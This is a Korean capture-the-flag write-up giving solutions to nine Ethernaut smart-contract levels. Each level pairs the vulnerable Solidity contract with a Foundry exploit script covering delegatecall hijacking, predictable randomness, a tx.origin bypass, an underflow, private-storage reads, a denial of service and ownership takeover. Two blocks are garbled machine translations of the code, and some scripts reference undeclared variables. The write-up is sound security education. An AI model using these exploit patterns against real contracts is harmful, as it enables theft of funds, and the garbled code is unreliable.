wargame
Ethernaut All solved
2024. 12. 5. 21:14
Force
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Force { /*
MEOW ?
/\_/\ /
____/ o o \
/~____ =ø= /
(______)__m_m)
*/ }귀엽다..!
PoC
selfdestruct 함수를 날리면 남아있는 eth를 받을 수 있다.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;
import {Script, console} from "forge-std/Script.sol";
contract attack {
constructor(address payable _target) payable {
selfdestruct(_target);
}
receive() payable external{}
}
contract exploit is Script {
function run() public {
uint256 pk = pk;
vm.startBroadcast(pk);
address payable target = payable(0x215C2B126D60F16Ed2a9036A4Df030AA0724e7db);
new attack{value: 0.001 ether}(target);
vm.stopBroadcast();
}
}Delegate
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Delegate {
address public owner;
constructor(address _owner) {
owner = _owner;
}
function pwn() public {
owner = msg.sender;
}
}
contract Delegation {
address public owner;
Delegate delegate;
constructor(address _delegateAddress) {
delegate = Delegate(_delegateAddress);
owner = msg.sender;
}
fallback() external {
(bool result,) = address(delegate).delegatecall(msg.data);
if (result) {
this;
}
}
}PoC
delegatecall을 통해서 외부 컨트랙트의 함수를 호출할 땐 스토리지가 덮여쓰일 수 있는데 이 점을 잘 고려해야합니다.
해당 문제는 Delegate 와 Delegation 컨트랙트의 owner가 같은 스토리지 번호를 사용하고 있기 때문에 pwn 함수를 호출하게 되면 Delegation 컨트랙트의 owner가 변경됩니다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
contract exploit is Script {
function run() public {
uint pk = pk;
vm.startBroadcast(pk);
address target = 0xedC5EB529948aa0e3365b8EBA435dE81617Cc4A5;
bytes memory data = abi.encodeWithSignature("pwn()");
target.call(data);
vm.stopBroadcast();
}
}
Ref
- https://velog.io/@youngju307/Solidity-Call-vs-Delegate-Call
Coinflip
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract CoinFlip {
uint256 public consecutiveWins;
uint256 lastHash;
uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
constructor() {
consecutiveWins = 0;
}
function flip(bool _guess) public returns (bool) {
uint256 blockValue = uint256(blockhash(block.number - 1));
if (lastHash == blockValue) {
revert();
}
lastHash = blockValue;
uint256 coinFlip = blockValue / FACTOR;
bool side = coinFlip == 1 ? true : false;
if (side == _guess) {
consecutiveWins++;
return true;
} else {
consecutiveWins = 0;
return false;
}
}
}
PoC
동전의 앞, 뒷면(true,false)를 10번 맞추면 되는 문제
factor와 block number은 미리 알 수 있기 때문에 동전 앞,뒷면을 예측할 수 있습니다.
interface ICoinFlip{
function flip(bool _guess) external returns (bool);
}
contract exploit {
function attack() public{
ICoinFlip target = ICoinFlip(0xF312A8f555137415878f323479780abc9a0d9Ab6);
uint factor = 57896044618658097711785492504343953926634992332820282019728792003956564819968;
uint blockValue = uint(blockhash(block.number - 1));
uint coinflip = blockValue / factor;
bool side = coinflip == 1 ? true : false;
target.flip(side);
}
}Telephone
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Telephone {
address public owner;
constructor() {
owner = msg.sender;
}
function changeOwner(address _owner) public {
if (tx.origin != msg.sender) {
owner = _owner;
}
}
}
PoC
EOA대신 CA로 호출하면 owner를 수정할 수 있습니다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface ITelephone{
function changeOwner(address _owner) external;
}
contract exploit is Script{
function run() public{
uint256 pk = pk;
vm.startBroadcast(pk);
new attack();
vm.stopBroadcast();
}
}
contract attack{
constructor(){
ITelephone target = ITelephone(0x66E30A375F40B30eEA6a12C59f32424842C36502);
target.changeOwner(0x114C69ba39B7db730504B61fb8861Cb9b25C5540);
}
}
Ref
Fallout
2024. 11. 13. 09:00
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
import "openzeppelin-contracts-06/math/SafeMath.sol";
contract Fallout {
using SafeMath for uint256;
mapping(address => uint256) allocations;
address payable public owner;
/* constructor */
function Fal1out() public payable {
owner = msg.sender;
allocations[owner] = msg.value;
}
modifier onlyOwner() {
require(msg.sender == owner, "caller is not the owner");
_;
}
function allocate() public payable {
allocations[msg.sender] = allocations[msg.sender].add(msg.value);
}
function sendAllocation(address payable allocator) public {
require(allocations[allocator] > 0);
allocator.transfer(allocations[allocator]);
}
function collectAllocations() public onlyOwner {
msg.sender.transfer(address(this).balance);
}
function allocatorBalance(address allocator) public view returns (uint256) {
return allocations[allocator];
}
}PoC
Fal1out 함수 호출하면 됩니다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IFallout{
function Fal1out() external payable;
}
contract exploit is Script {
function run() public {
uint pk = pk;
vm.startBroadcast(pk);
IFallout target = IFallout(0x2AA05E277f1967DE4a78529ECf610f0F9c36d00A);
target.Fal1out();
vm.stopBroadcast();
}
}
Token
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;
contract Token {
mapping(address => uint256) balances;
uint256 public totalSupply;
constructor(uint256 _initialSupply) public {
balances[msg.sender] = totalSupply = _initialSupply;
}
function transfer(address _to, uint256 _value) public returns (bool) {
require(balances[msg.sender] - _value >= 0);
balances[msg.sender] -= _value;
balances[_to] += _value;
return true;
}
function balanceOf(address _owner) public view returns (uint256 balance) {
return balances[_owner];
}
}PoC
처음에 발급 받은 토큰 개수보다 더 크게 증가시키는 문제이다.
배포된 컨트랙트 버전이 0.6.0 => 오버/언더플로우 검사 X
20 - 21 = uint256 max값
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IToken{
function transfer(address _to, uint256 _value) external returns (bool);
}
contract exploit is Script{
function run() public {
uint pk = pk;
vm.startBroadcast(pk);
IToken target = IToken(0x6b14Da6F2dFcE31d67284Cf2E2Ff3Fd1e265075F);
target.transfer(msg.sender,21);
vm.stopBroadcast();
}
}Vault
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Vault {
bool public locked;
bytes32 private password;
constructor(bytes32 _password) {
locked = true;
password = _password;
}
function unlock(bytes32 _password) public {
if (password == _password) {
locked = false;
}
}
}
PoC
스토리지 조회하면 나온다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IVault {
function unlock(bytes32 _password) external;
function locked() external view returns (bool);
}
contract VaultAttack is Script {
function run() public {
uint256 pk = pk;
address vaultAddress = 0x1e13911fBBa01aFad8a23413E420F9039D98dBd9;
vm.startBroadcast(pk);
bytes32 password = vm.load(vaultAddress, bytes32(uint256(1)));
IVault(vaultAddress).unlock(password);
vm.stopBroadcast();
}
}// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; "forge-std/Script.sol"에서 {스크립트, 콘솔}을 가져옵니다. 인터페이스 IVault { 기능 잠금 해제(bytes32 _password) 외부; 함수 잠김() 외부 보기 반환(bool); } 계약 VaultAttack은 Script { function run() public { uint256 pk = pk; 주소 VaultAddress = 0x1e13911fBBa01aFad8a23413E420F9039D98dBd9; vm.startBroadcast(pk); bytes32 비밀번호 = vm.load(vaultAddress, bytes32(uint256(1))); IVault(vaultAddress).unlock(비밀번호); vm.stopBroadcast(); } }
King
2024. 11. 13. 09:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract King {
address king;
uint256 public prize;
address public owner;
constructor() payable {
owner = msg.sender;
king = msg.sender;
prize = msg.value;
}
receive() external payable {
require(msg.value >= prize || msg.sender == owner);
payable(king).transfer(msg.value);
king = msg.sender;
prize = msg.value;
}
function _king() public view returns (address) {
return king;
}
}PoC
돈을 받지 못해 transfer 함수 호출이 거부되므로 king을 계속 유지할 수 있습니다.
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IKing {
function prize() external view returns (uint256);
}
contract attack {
constructor(address payable target) payable {
target.call{value: msg.value}("");
}
}
contract exploit is Script {
function run() public {
uint256 pk = pk;
address addr = 0x612fE2418bB97C220Cc8F63Cc95E3261d4664CD9;
vm.startBroadcast(privateKey);
new attack{value: 0.0010001 ether}(payable(addr));
vm.stopBroadcast();
}
}Fallback
2024. 11. 12. 20:00
Prob
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
contract Fallback {
mapping(address => uint256) public contributions;
address public owner;
constructor() {
owner = msg.sender;
contributions[msg.sender] = 1000 * (1 ether);
}
modifier onlyOwner() {
require(msg.sender == owner, "caller is not the owner");
_;
}
function contribute() public payable {
require(msg.value < 0.001 ether);
contributions[msg.sender] += msg.value;
if (contributions[msg.sender] > contributions[owner]) {
owner = msg.sender;
}
}
function getContribution() public view returns (uint256) {
return contributions[msg.sender];
}
function withdraw() public onlyOwner {
payable(owner).transfer(address(this).balance);
}
receive() external payable {
require(msg.value > 0 && contributions[msg.sender] > 0);
owner = msg.sender;
}
}
PoC
receive 함수가 호출될 때 msg.value와 contributions 이 0보다 크면 owner가 변경됩니다.
이후 withdraw 호출
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
interface IFallback{
function contribute() external payable;
function withdraw() external;
}
contract exploit is Script {
function run() public {
uint pk = pk;
vm.startBroadcast(pk);
IFallback target = IFallback(0x2712E9e4423408BAA485404d941DcebA00db70E0);
target.contribute{value: 0.1 gwei}();
address(target).call{value: 0.1 gwei}("");
target.withdraw();
vm.stopBroadcast();
}
}
// SPDX-License-Identifier: MIT pragma solidity ^0.8.0; "forge-std/Script.sol"에서 {스크립트, 콘솔}을 가져옵니다. 인터페이스 IFallback{ 함수 기여() 외부 지급; 함수 철회() 외부; } 계약 익스플로잇은 Script { function run() public { uint pk = pk; vm.startBroadcast(pk); IFallback 대상 = IFallback(0x2712E9e4423408BAA485404d941DcebA00db70E0); target.contribute{값: 0.1 gwei}(); 주소(대상).call{값: 0.1 gwei}(""); target.withdraw(); vm.stopBroadcast(); } }